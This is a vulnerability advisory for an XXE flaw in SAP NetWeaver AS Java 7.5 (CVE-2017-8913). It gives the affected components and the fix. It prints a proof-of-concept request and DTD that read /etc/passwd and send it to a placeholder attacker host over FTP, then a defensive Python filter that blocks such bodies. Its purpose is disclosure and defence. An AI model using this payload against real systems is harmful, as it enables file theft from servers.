Application: SAP NetWeaver
Versions Affected: SAP NetWeaver AS JAVA 7.5
Vendor URL: SAP
Bugs: XXE
Reported: 17.06.2016
Vendor response: 18.06.2016
Date of Public Advisory: 14.02.2017
Reference: SAP Security Note 2386873
Author: Mathieu Geli (ERPScan)
Class: XXE
Impact: Denial of Service, Read File
Remotely Exploitable: yes
Locally Exploitable: no
CVE Name: CVE-2017-8913
CVSS Base Score v3: 6.5 / 10
CVSS Base Vector:

| Metric | Value |
|---|---|
| AV: Attack Vector (Related exploit range) | Network (N) |
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | Low (L) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |
A malicious user can modify an XML-based request to include XML content that is then parsed locally by the server.
An attacker can use the XML external entity vulnerability to send specially crafted, unauthorized XML requests that the server-side XML parser processes, including any external entity declarations they carry. Through this, the attacker gains unauthorized read access to the OS filesystem.
VCFLEX7.00
VCFRAMEWORK7.00
VC70RUNTIME7.30
VC70RUNTIME7.31
VC70RUNTIME7.40
VC70RUNTIME7.50
To correct this vulnerability, install SAP Security Note 2386873.
```http
POST /irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.BIKit.default HTTP/1.1
Host: 172.16.30.29:50000
User-Agent: curl/7.43.0
Accept: */*
Content-Type: xml;charset=UTF-8
Content-Length: 181

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY % pe SYSTEM "http://ATTACKERIP/xxe_file">
%pe;
%param1;
<!ELEMENT foo (#PCDATA)>
]>
&leak;
```

and xxe_file is:

```xml
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY leak SYSTEM 'ftp://attacker_ip:2121/%payload;'>">
```
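As an added defensive example (not code from the ERPScan advisory or from SAP), the following Python shows a pre-parse gate of the kind a defender can put in front of an XML endpoint like the one above: it classifies a request body by whether it declares a DOCTYPE and whether that DTD contains external (`SYSTEM`/`PUBLIC`) entities or parameter-entity references, and refuses to parse anything carrying a DTD at all. The two sample bodies are constructed here; the first mirrors the shape of the advisory's request, with the same placeholder hosts. The decision is made on the body content rather than the `Content-Type` header, because the advisory's request uses the non-standard media type `xml;charset=UTF-8`, which an allow-list keyed only on `application/xml` or `text/xml` would not inspect.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies (not captured traffic). POC_BODY mirrors the
# structure of the advisory's request, placeholders included.
POC_BODY = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    '<!DOCTYPE foo [\n'
    '<!ENTITY % pe SYSTEM "http://ATTACKERIP/xxe_file">\n'
    '%pe;\n'
    '%param1;\n'
    '<!ELEMENT foo (#PCDATA)>\n'
    ']>\n'
    '&leak;\n'
)
BENIGN_BODY = '<?xml version="1.0"?><request><id>42</id></request>'

# Any DTD at all.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity whose value comes from an external identifier.
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?[^\s>]+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE
)
# Parameter-entity reference inside the internal subset (e.g. %pe;).
PARAM_ENTITY_REF_RE = re.compile(r"%[A-Za-z_][\w.-]*;")


def classify_xml_body(body: str) -> str:
    """Return 'no-dtd', 'internal-dtd' or 'external-entity' for a body."""
    if not DOCTYPE_RE.search(body):
        return "no-dtd"
    if EXTERNAL_ENTITY_RE.search(body) or PARAM_ENTITY_REF_RE.search(body):
        return "external-entity"
    return "internal-dtd"


def inspect_request(content_type: str, body: str) -> dict:
    """Inspect a request based on what the body looks like, not on the header.

    Returns the parsed media type, the body verdict and whether to block.
    Policy (an assumption of this example): the endpoint never needs a DTD,
    so every body that declares one is blocked, external entities or not.
    """
    media_type = content_type.split(";", 1)[0].strip().lower()
    # Strip a BOM and leading whitespace before deciding whether it is XML.
    body_is_xml = body.lstrip("\ufeff \t\r\n").startswith("<")
    verdict = classify_xml_body(body) if body_is_xml else "not-xml"
    return {
        "media_type": media_type,
        "verdict": verdict,
        "block": verdict in ("internal-dtd", "external-entity"),
    }


class XmlPolicyError(ValueError):
    """Raised when a body violates the no-DTD policy."""


def safe_parse(body: str) -> ET.Element:
    """Parse a body only after the gate has confirmed it carries no DTD."""
    verdict = classify_xml_body(body)
    if verdict != "no-dtd":
        raise XmlPolicyError(f"rejected request body: {verdict}")
    return ET.fromstring(body)


if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_request("xml;charset=UTF-8", body))
```

The gate runs on the raw bytes-decoded body before any XML library sees it, so it does not depend on a particular parser's default handling of external entities. Rejecting every DOCTYPE is the simplest policy and is appropriate for an endpoint whose expected request formats never use one; a service that legitimately needs internal DTDs would instead block on the `external-entity` verdict and still disable external entity and DTD resolution in the parser itself.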